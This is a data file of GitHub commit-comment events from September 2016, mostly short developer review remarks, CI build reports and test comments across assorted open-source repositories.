{"id":"4544620373","type":"CommitCommentEvent","actor":{"login":"durner"},"repo":{"name":"hschmidtchen/hschmidtchen.github.io"},"payload":{"comment":{"id":18974848,"position":null,"line":null,"path":null,"commit_id":"31466d0881a2e53f44284f41f6d0e8cc244f4a1d","created_at":"2016-09-10T19:59:59Z","updated_at":"2016-09-10T19:59:59Z","body":"How did your url adding commit go through our thorough code review process? :smile: "}},"created_at":"2016-09-10T19:59:59Z"}
{"id":"4543262950","type":"CommitCommentEvent","actor":{"login":"anenno"},"repo":{"name":"ub-cse442/election-and-data-sci"},"payload":{"comment":{"id":18972153,"position":null,"line":null,"path":null,"commit_id":"2c5d113abcf917798404b618632fc5924a4fa5c9","created_at":"2016-09-10T02:01:14Z","updated_at":"2016-09-10T02:01:14Z","body":"didn't have previous commit but this is all that I did, changed background to be an image of an american flag and the separate sections to be all white and floating above the background"}},"created_at":"2016-09-10T02:01:14Z"}
{"id":"4543265580","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18972156,"position":null,"line":null,"path":null,"commit_id":"37205eb345f50af751347c0a142f7763ea912612","created_at":"2016-09-10T02:02:58Z","updated_at":"2016-09-10T02:02:58Z","body":"Yeah, I didn't realize that before, but squashing does make having commits that depend on other commits less elegant."}},"created_at":"2016-09-10T02:02:58Z"}
{"id":"4543265619","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972157,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T02:03:00Z","updated_at":"2016-09-10T02:03:00Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-10T02:03:00Z"}
{"id":"4543267274","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":18972160,"position":null,"line":null,"path":null,"commit_id":"f712a7cb56c70046f20be900b53b23e90b142d43","created_at":"2016-09-10T02:04:01Z","updated_at":"2016-09-10T02:04:01Z","body":"Yeah I do hate the way got history looks with merge commits.\r\n\r\nI'll maybe switch that in my IDE. I have default it merge mainly due to having been burnt before - coworker rebased, force-pushed and blew away 2 months of work. After that we made everyone default to merge :p"}},"created_at":"2016-09-10T02:04:01Z"}
{"id":"4543269790","type":"CommitCommentEvent","actor":{"login":"zhk0603"},"repo":{"name":"zhk0603/aspnetboilerplate"},"payload":{"comment":{"id":18972163,"position":null,"line":null,"path":null,"commit_id":"07d7616b07611bf1eb36e531c737ec8493b48ab9","created_at":"2016-09-10T02:05:45Z","updated_at":"2016-09-10T02:05:45Z","body":"11"}},"created_at":"2016-09-10T02:05:45Z"}
{"id":"4543273082","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972169,"position":11,"line":11,"path":"db/migrate/20160903215913_create_relationships.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:08:08Z","updated_at":"2016-09-10T02:08:08Z","body":"add_indexで、カラムのデータを取り出して高速で検索できるようにしてある。\r\nunique: trueで、同じユーザーを二回以上フォローしないように設定してある。"}},"created_at":"2016-09-10T02:08:08Z"}
{"id":"4543273495","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18972171,"position":null,"line":null,"path":null,"commit_id":"822b53674093b45e903480e15c8a0913d8d09fb8","created_at":"2016-09-10T02:08:26Z","updated_at":"2016-09-10T02:08:26Z","body":"Here is a better fix:   215f3a9\r\n"}},"created_at":"2016-09-10T02:08:26Z"}
{"id":"4543273757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972174,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T02:08:39Z","updated_at":"2016-09-10T02:08:39Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1779 of 1779 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T02:08:39Z"}
{"id":"4543274559","type":"CommitCommentEvent","actor":{"login":"harryom"},"repo":{"name":"harryom/spring"},"payload":{"comment":{"id":18972176,"position":null,"line":null,"path":null,"commit_id":"e8052603d411349f9dbea2d8001c0ab9bfb0bc2b","created_at":"2016-09-10T02:09:21Z","updated_at":"2016-09-10T02:09:21Z","body":"changed from git"}},"created_at":"2016-09-10T02:09:21Z"}
{"id":"4543274742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972179,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T02:09:29Z","updated_at":"2016-09-10T02:09:29Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T02:09:29Z"}
{"id":"4543275016","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972181,"position":9,"line":9,"path":"app/views/tweets/index.html.erb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:09:40Z","updated_at":"2016-09-10T02:09:40Z","body":"link_toの後''はずしてuser.nicknameに変更した。"}},"created_at":"2016-09-10T02:09:40Z"}
{"id":"4543276724","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18972185,"position":null,"line":null,"path":null,"commit_id":"427be6a77febc2640ce32081481b83a2cff3161f","created_at":"2016-09-10T02:10:55Z","updated_at":"2016-09-10T02:10:55Z","body":"This time attribute is actually date+time"}},"created_at":"2016-09-10T02:10:55Z"}
{"id":"4543277309","type":"CommitCommentEvent","actor":{"login":"bFraley"},"repo":{"name":"Upper-Polo/weather-app"},"payload":{"comment":{"id":18972187,"position":null,"line":null,"path":null,"commit_id":"e621844a0673b9676697a6394139b145da6df6e2","created_at":"2016-09-10T02:11:27Z","updated_at":"2016-09-10T02:11:27Z","body":"Resolves #2 "}},"created_at":"2016-09-10T02:11:27Z"}
{"id":"4543278728","type":"CommitCommentEvent","actor":{"login":"anonymous28456"},"repo":{"name":"NTUGrandChallenge/GC-Recruit-Web"},"payload":{"comment":{"id":18972191,"position":null,"line":null,"path":null,"commit_id":"6763523e19ea68028264b23e6a2d18f3b1a04590","created_at":"2016-09-10T02:12:34Z","updated_at":"2016-09-10T02:12:34Z","body":"哦！好的"}},"created_at":"2016-09-10T02:12:34Z"}
{"id":"4543284329","type":"CommitCommentEvent","actor":{"login":"zhang13690"},"repo":{"name":"CyanogenMod/android_device_zuk_ham"},"payload":{"comment":{"id":18972199,"position":null,"line":null,"path":null,"commit_id":"85c3f604ed7abded2b5119703558a488b8f47881","created_at":"2016-09-10T02:16:43Z","updated_at":"2016-09-10T02:16:43Z","body":"大哥啊，Z1 的Mod OS好久没更新了啊"}},"created_at":"2016-09-10T02:16:43Z"}
{"id":"4543284481","type":"CommitCommentEvent","actor":{"login":"technoken"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18972200,"position":null,"line":null,"path":null,"commit_id":"d62f422e3d951a50bb0b71d0dc69143eace970f9","created_at":"2016-09-10T02:16:50Z","updated_at":"2016-09-10T02:16:50Z","body":"Alright. Thanks to both of you! @Atemo @lucasoli "}},"created_at":"2016-09-10T02:16:50Z"}
{"id":"4543294169","type":"CommitCommentEvent","actor":{"login":"coatless"},"repo":{"name":"SMAC-Group/assets"},"payload":{"comment":{"id":18972215,"position":null,"line":null,"path":null,"commit_id":"f3218feb430776eb5d82a292caa1e6c8e7c19a19","created_at":"2016-09-10T02:24:47Z","updated_at":"2016-09-10T02:24:47Z","body":"Crop to 250px to 250px"}},"created_at":"2016-09-10T02:24:47Z"}
{"id":"4543299192","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972219,"position":4,"line":4,"path":"app/views/users/_follow.html.erb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:28:42Z","updated_at":"2016-09-10T02:28:42Z","body":"buildはログイン中のユーザーに能動的関係を持たせるよう設定するために使う\r\nfollowed_idにユーザーのidを入れる作業をhidden_field_tagでしている"}},"created_at":"2016-09-10T02:28:42Z"}
{"id":"4543301357","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972221,"position":4,"line":4,"path":"app/views/users/_unfollow.html.erb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:30:20Z","updated_at":"2016-09-10T02:30:20Z","body":"find_byでフォローしているユーザーを検索し、deleteメソッドを使ってアンフォローできるようにしてある。"}},"created_at":"2016-09-10T02:30:20Z"}
{"id":"4543302360","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18972222,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-10T02:31:08Z","updated_at":"2016-09-10T02:31:08Z","body":"I'm not sure what you're saying, can you provide an example?   It sounds like you're describing a behavior change, not something that prevents source code from building."}},"created_at":"2016-09-10T02:31:08Z"}
{"id":"4543307462","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972240,"position":9,"line":9,"path":"app/views/users/show.html.erb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:35:24Z","updated_at":"2016-09-10T02:35:24Z","body":"ログインしていないユーザーで、フォローしているユーザーに対してはアンフォローのボタンを表示して、フォローしていないユーザーに対してはフォローボタンを表示する。？？"}},"created_at":"2016-09-10T02:35:24Z"}
{"id":"4543308450","type":"CommitCommentEvent","actor":{"login":"c3r1c3"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18972243,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-10T02:36:13Z","updated_at":"2016-09-10T02:36:13Z","body":"Bring on the feature/plugin parity."}},"created_at":"2016-09-10T02:36:13Z"}
{"id":"4543310291","type":"CommitCommentEvent","actor":{"login":"enterprising"},"repo":{"name":"enterprising/coolweather"},"payload":{"comment":{"id":18972247,"position":null,"line":null,"path":null,"commit_id":"57411f755f8776d026195c8b93d2942a9cc98398","created_at":"2016-09-10T02:37:46Z","updated_at":"2016-09-10T02:37:46Z","body":"demo"}},"created_at":"2016-09-10T02:37:46Z"}
{"id":"4543312140","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18972249,"position":null,"line":null,"path":null,"commit_id":"1dcfaa8b6acc5380208359fb02ffac843fd4289d","created_at":"2016-09-10T02:39:10Z","updated_at":"2016-09-10T02:39:10Z","body":"Go to your admin, theme customizations, manage theme, widget tab. Install widget. I will make amends to the installer file later. "}},"created_at":"2016-09-10T02:39:10Z"}
{"id":"4543313797","type":"CommitCommentEvent","actor":{"login":"BeyondBruce"},"repo":{"name":"BeyondBruce/listview"},"payload":{"comment":{"id":18972250,"position":null,"line":null,"path":null,"commit_id":"d2fc78fdbe669a435cd8f87a9f0dd8eb14f9c9e7","created_at":"2016-09-10T02:40:32Z","updated_at":"2016-09-10T02:40:32Z","body":"test"}},"created_at":"2016-09-10T02:40:32Z"}
{"id":"4543313955","type":"CommitCommentEvent","actor":{"login":"jemz14"},"repo":{"name":"jemz14/MY-WEBSITE"},"payload":{"comment":{"id":18972251,"position":null,"line":null,"path":null,"commit_id":"c555fa4598c42455f03823234bfeb59d85601274","created_at":"2016-09-10T02:40:40Z","updated_at":"2016-09-10T02:40:40Z","body":"haha"}},"created_at":"2016-09-10T02:40:40Z"}
{"id":"4543314473","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972252,"position":7,"line":8,"path":"config/routes.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T02:41:08Z","updated_at":"2016-09-10T02:41:08Z","body":"memberとすることで、ユーザーidが含まれるURLを扱えるようになる。getをつけることでデータを表示するページである users/1/followingというようなurlのページを表示できるようになる。"}},"created_at":"2016-09-10T02:41:08Z"}
{"id":"4543314761","type":"CommitCommentEvent","actor":{"login":"xrys-ku"},"repo":{"name":"xrys-ku/html"},"payload":{"comment":{"id":18972253,"position":null,"line":null,"path":null,"commit_id":"afd1d21d6033529609dd6734442b4760a44025bb","created_at":"2016-09-10T02:41:23Z","updated_at":"2016-09-10T02:41:23Z","body":"https://github.com/xrys-ku/html/commit/afd1d21d6033529609dd6734442b4760a44025bb"}},"created_at":"2016-09-10T02:41:23Z"}
{"id":"4543316626","type":"CommitCommentEvent","actor":{"login":"sleexyz"},"repo":{"name":"sleexyz/haskell-fun"},"payload":{"comment":{"id":18972255,"position":145,"line":118,"path":"TypeSafePrintF.hs","commit_id":"4bb9736de002515f510769b8c00a3830b0d3dd24","created_at":"2016-09-10T02:42:55Z","updated_at":"2016-09-10T02:42:55Z","body":"@hlian oh cool, thanks,  it works! I tried it earlier with\r\n```\r\nProxy @ [...]\r\n```\r\nand GHC threw a fit, so I assumed it wasn't possible\r\n\r\nso moral of the story is  to use always indicate universe lifiting for data kinds :p\r\n```\r\nProxy @'[...]\r\n```\r\n(with **'**)"}},"created_at":"2016-09-10T02:42:55Z"}
{"id":"4543320507","type":"CommitCommentEvent","actor":{"login":"bijayitaThapa"},"repo":{"name":"bijayitaThapa/firstGitHub"},"payload":{"comment":{"id":18972258,"position":null,"line":null,"path":null,"commit_id":"5536c6ffc0796ddb38b18be541b0584aa6c2fb8f","created_at":"2016-09-10T02:46:02Z","updated_at":"2016-09-10T02:46:02Z","body":"test"}},"created_at":"2016-09-10T02:46:02Z"}
{"id":"4543322441","type":"CommitCommentEvent","actor":{"login":"xcatliu"},"repo":{"name":"xcatliu/mobi.css"},"payload":{"comment":{"id":18972259,"position":14,"line":3,"path":"site/source/index.md","commit_id":"8f2a932a5b995595cf06d78cb48a3c5300d6d410","created_at":"2016-09-10T02:47:26Z","updated_at":"2016-09-10T02:47:26Z","body":"Fixed #45 "}},"created_at":"2016-09-10T02:47:26Z"}
{"id":"4543324510","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"Grayson112233/sdl-c-tutorials"},"payload":{"comment":{"id":18972260,"position":3,"line":2,"path":"README.md","commit_id":"aa49d9886099db2baa8b6e54b5a87b1cf0669a50","created_at":"2016-09-10T02:49:02Z","updated_at":"2016-09-10T02:49:02Z","body":"loosely*"}},"created_at":"2016-09-10T02:49:02Z"}
{"id":"4543326165","type":"CommitCommentEvent","actor":{"login":"bluefeature"},"repo":{"name":"bluefeature/repoOne"},"payload":{"comment":{"id":18972262,"position":null,"line":null,"path":null,"commit_id":"513e3f06f5b9100a3768012f57282779e155fa80","created_at":"2016-09-10T02:50:25Z","updated_at":"2016-09-10T02:50:25Z","body":"to rama"}},"created_at":"2016-09-10T02:50:25Z"}
{"id":"4543326235","type":"CommitCommentEvent","actor":{"login":"jcorona08"},"repo":{"name":"cs371p-fall-2016/collatz-tests"},"payload":{"comment":{"id":18972263,"position":null,"line":null,"path":null,"commit_id":"76a9202cd67b87671d4b77b103eaddaee2e4ccbf","created_at":"2016-09-10T02:50:28Z","updated_at":"2016-09-10T02:50:28Z","body":"Updated the files "}},"created_at":"2016-09-10T02:50:28Z"}
{"id":"4543326788","type":"CommitCommentEvent","actor":{"login":"arnocandel"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18972264,"position":12,"line":130,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWaterImageIterator.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-10T02:50:54Z","updated_at":"2016-09-10T02:50:54Z","body":"This fixes the race condition - but why?"}},"created_at":"2016-09-10T02:50:54Z"}
{"id":"4543331955","type":"CommitCommentEvent","actor":{"login":"johanatan"},"repo":{"name":"gator1/jepsen"},"payload":{"comment":{"id":18972278,"position":14,"line":14,"path":"kafka/src/jepsen/kafka.clj","commit_id":"5f59be0c6eaaf223b9f1d39e5bd65fd5f13ad0a0","created_at":"2016-09-10T02:55:09Z","updated_at":"2016-09-10T02:55:09Z","body":"This doesn't seem to be used."}},"created_at":"2016-09-10T02:55:09Z"}
{"id":"4543332563","type":"CommitCommentEvent","actor":{"login":"Manticmage"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18972279,"position":null,"line":null,"path":null,"commit_id":"9120d3301e63258b9397cf97e037d25f60e62e89","created_at":"2016-09-10T02:55:39Z","updated_at":"2016-09-10T02:55:39Z","body":"@maxtherabbit With the revert of @takhlaq  fix: ab84f51de3881e3a24262d5d1b9c081cbf9b3759 and this commit, a player will once again not receive EXP when a PL gets hate and is attacked by the mob."}},"created_at":"2016-09-10T02:55:39Z"}
{"id":"4543333392","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18972280,"position":12,"line":130,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWaterImageIterator.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-10T02:56:21Z","updated_at":"2016-09-10T02:56:21Z","body":"Just thinking - you need to block for a consumer to finish. However, when you were returning `false` (without block) then you were not waiting for the consumer from the last iteration. "}},"created_at":"2016-09-10T02:56:21Z"}
{"id":"4543333623","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"ericelliott/rtype"},"payload":{"comment":{"id":18972282,"position":108,"line":113,"path":"README.md","commit_id":"c631eeb5d55b656f6695f44e215c639707dcecc7","created_at":"2016-09-10T02:56:34Z","updated_at":"2016-09-10T02:56:34Z","body":"@ericelliott knowing that TS uses `;`, why did you pick `,` as the separator?"}},"created_at":"2016-09-10T02:56:34Z"}
{"id":"4543334888","type":"CommitCommentEvent","actor":{"login":"johanatan"},"repo":{"name":"gator1/jepsen"},"payload":{"comment":{"id":18972284,"position":66,"line":66,"path":"kafka/src/jepsen/kafka.clj","commit_id":"5f59be0c6eaaf223b9f1d39e5bd65fd5f13ad0a0","created_at":"2016-09-10T02:57:39Z","updated_at":"2016-09-10T02:57:39Z","body":"This is missing a `\"\\n\"` after `join` (my mistake).\r\n\r\nDid you check the output to see if it was as I expect all of the lines joined together without line breaks?\r\n\r\nThere may be other problems however."}},"created_at":"2016-09-10T02:57:39Z"}
{"id":"4543335059","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-lairdhousehold"},"payload":{"comment":{"id":18972285,"position":null,"line":null,"path":null,"commit_id":"bf600336744958c9343421c7df1c827dc7f99e17","created_at":"2016-09-10T02:57:48Z","updated_at":"2016-09-10T02:57:48Z","body":"When I try to run the code, it does not work. When I fix the path names to the JavaScript within the Gruntfile.js, JSHint has several errors. Take a look at your Gruntfile and remove any unnecessary tasks (sass and reference to angular).\r\n\r\nI have taken a look at the code to see if I can give some guidance. \r\n\r\nI have concern with how you built the robots. For example, I see AerialMech extends Robot and then MissileBot extends AerialMech. I am not seeing what defines an AerialMech. \r\n\r\nWe would like to see you use the ideas and methods discussed in class. This would include using the prototype keyword to create your bots. Consider what defines a robot and then the identifing aspects of the different models. For example, all robots have health however different models have specific ranges.\r\n\r\nGive it a shot. There are many articles about prototypes, maybe this one will be helpful: https://timkadlec.com/2008/01/using-prototypes-in-javascript/"}},"created_at":"2016-09-10T02:57:48Z"}
{"id":"4543335731","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/mpmp"},"payload":{"comment":{"id":18972287,"position":null,"line":null,"path":null,"commit_id":"2afc407a44199936e019aa971e63626d38f4372d","created_at":"2016-09-10T02:58:23Z","updated_at":"2016-09-10T02:58:23Z","body":"@leletec @dieechtenilente What have I done?\r\n\r\n```\r\nS->C game\r\nmoney-update\r\n\tint      amount <money>\r\n\tusername name <player>\r\n```\r\nbecomes this: \r\n```\r\n/* Generated at Sat Sep 10 04:48:53 CES 2016 */\r\n\r\n/**\r\n * S->C game money-update\r\n */\r\npublic class MoneyUpdate extends CmdFunc {\r\n\tprivate MoneyUpdater mu;\r\n\r\n\t@Override\r\n\tpublic void exec(String line, Conn conn) {\r\n\t\tString args[] = line.split(\" \");\r\n\t\tint amount;\r\n\t\tString name;\r\n\r\n\t\tif(args.length < 3) {\r\n\t\t\tconn.sendErr(ErrCode.Usage, \"money-update <money> <player>\");\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tname = String.join(, Arrays.copyOfRange(args, 2, args.length));\r\n\r\n\t\ttry {\r\n\t\t\tamount = Integer.parseInt(args[1]);\r\n\t\t} catch(NumberFormatException nfe) {\r\n\t\t\tconn.sendErr(ErrCode.Usage, \"money-update <money> <player>\");\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tmu.moneyUpdate(amount, name);\r\n\t}\r\n\r\n\r\n\t@Override\r\n\tpublic void error(ErrCode err, String line, Conn conn) {/* herp derp */}\r\n\r\n\tpublic interface MoneyUpdater {\r\n\t\tpublic void moneyUpdate(int amount, String name);\r\n\t}\r\n\r\n\tpublic void addMoneyUpdater(MoneyUpdater mu) {\r\n\t\tthis.mu = mu;\r\n\t}\r\n}\r\n```"}},"created_at":"2016-09-10T02:58:23Z"}
{"id":"4543336350","type":"CommitCommentEvent","actor":{"login":"Weipingh"},"repo":{"name":"fuzzylogicftc/ftc2016"},"payload":{"comment":{"id":18972289,"position":null,"line":null,"path":null,"commit_id":"9295518d40012b43c94da690c835925ba39a5002","created_at":"2016-09-10T02:58:53Z","updated_at":"2016-09-10T02:58:53Z","body":"Can you elaborate why you have to disable the builtin library? \r\nPlease review your setup process."}},"created_at":"2016-09-10T02:58:53Z"}
{"id":"4543336545","type":"CommitCommentEvent","actor":{"login":"rabdellah"},"repo":{"name":"rabdellah/rama"},"payload":{"comment":{"id":18972290,"position":null,"line":null,"path":null,"commit_id":"9c940e6833e933f5d1b7992b387e65b99aab5725","created_at":"2016-09-10T02:59:05Z","updated_at":"2016-09-10T02:59:05Z","body":"this is ramacomment on this commit"}},"created_at":"2016-09-10T02:59:05Z"}
{"id":"4544621646","type":"CommitCommentEvent","actor":{"login":"DenisovIlya"},"repo":{"name":"DenisovIlya/Sigma"},"payload":{"comment":{"id":18974850,"position":null,"line":null,"path":null,"commit_id":"c5fc6a3e876cfd5282db41257de4e29d005037d8","created_at":"2016-09-10T20:00:40Z","updated_at":"2016-09-10T20:00:40Z","body":"test"}},"created_at":"2016-09-10T20:00:40Z"}
{"id":"4544621852","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974851,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T20:00:48Z","updated_at":"2016-09-10T20:00:48Z","body":"Hoorah!"}},"created_at":"2016-09-10T20:00:48Z"}
{"id":"4544623668","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18974853,"position":null,"line":null,"path":null,"commit_id":"bf147e75cbdbdea89b836dd2b9cfdfb35a3328a1","created_at":"2016-09-10T20:02:01Z","updated_at":"2016-09-10T20:02:01Z","body":"Groovy"}},"created_at":"2016-09-10T20:02:01Z"}
{"id":"4544625892","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18974855,"position":21,"line":55,"path":"app/src/main/java/main/MainActivity.java","commit_id":"683c0bd19154536cd8f0384ad8c9948d7a459ca1","created_at":"2016-09-10T20:03:23Z","updated_at":"2016-09-10T20:03:23Z","body":"Seems to be the magic incantation here, right?"}},"created_at":"2016-09-10T20:03:23Z"}
{"id":"4544628312","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18974857,"position":null,"line":null,"path":null,"commit_id":"9b9ebabcc402f8c9a7c0578fa645e5b84053355d","created_at":"2016-09-10T20:05:05Z","updated_at":"2016-09-10T20:05:05Z","body":"This actually caused issues inserting images into the Recycler, as the id is repeated throughout the view"}},"created_at":"2016-09-10T20:05:05Z"}
{"id":"4544628339","type":"CommitCommentEvent","actor":{"login":"cfljam"},"repo":{"name":"PlantandFoodResearch/VariantAnalysis"},"payload":{"comment":{"id":18974858,"position":null,"line":null,"path":null,"commit_id":"2d852e3f79782736e97020c5a3234a02c5ad7f75","created_at":"2016-09-10T20:05:06Z","updated_at":"2016-09-10T20:05:06Z","body":"awesome!"}},"created_at":"2016-09-10T20:05:06Z"}
{"id":"4544630954","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18974865,"position":4,"line":4,"path":"src/duplicated.jl","commit_id":"2bac2111ed304ff32b246384ba8653d9d7415193","created_at":"2016-09-10T20:07:00Z","updated_at":"2016-09-10T20:07:00Z","body":"Should use backtick \"`\" instead of single quote \" ' \" to mark code"}},"created_at":"2016-09-10T20:07:00Z"}
{"id":"4544632808","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974868,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T20:08:20Z","updated_at":"2016-09-10T20:08:20Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T20:08:20Z"}
{"id":"4544634339","type":"CommitCommentEvent","actor":{"login":"illori"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18974870,"position":null,"line":null,"path":null,"commit_id":"2f667a06ff4984a665fefc8cdcd9e4e02a385f36","created_at":"2016-09-10T20:09:30Z","updated_at":"2016-09-10T20:09:30Z","body":"i have been informed that php version 5.4.16 has an issue with the above change.\r\n\r\nFatal error: Can't use function return value in write context in C:\\wamp\\www\\github2.1\\Sources\\Subs.php on line 1278\r\n\r\nCall Stack:\r\n    0.0270     871424   1. {main}() C:\\wamp\\www\\github2.1\\upgrade.php:0\r\n    0.1510     885224   2. loadEssentialData() C:\\wamp\\www\\github2.1\\upgrade.php:132"}},"created_at":"2016-09-10T20:09:30Z"}
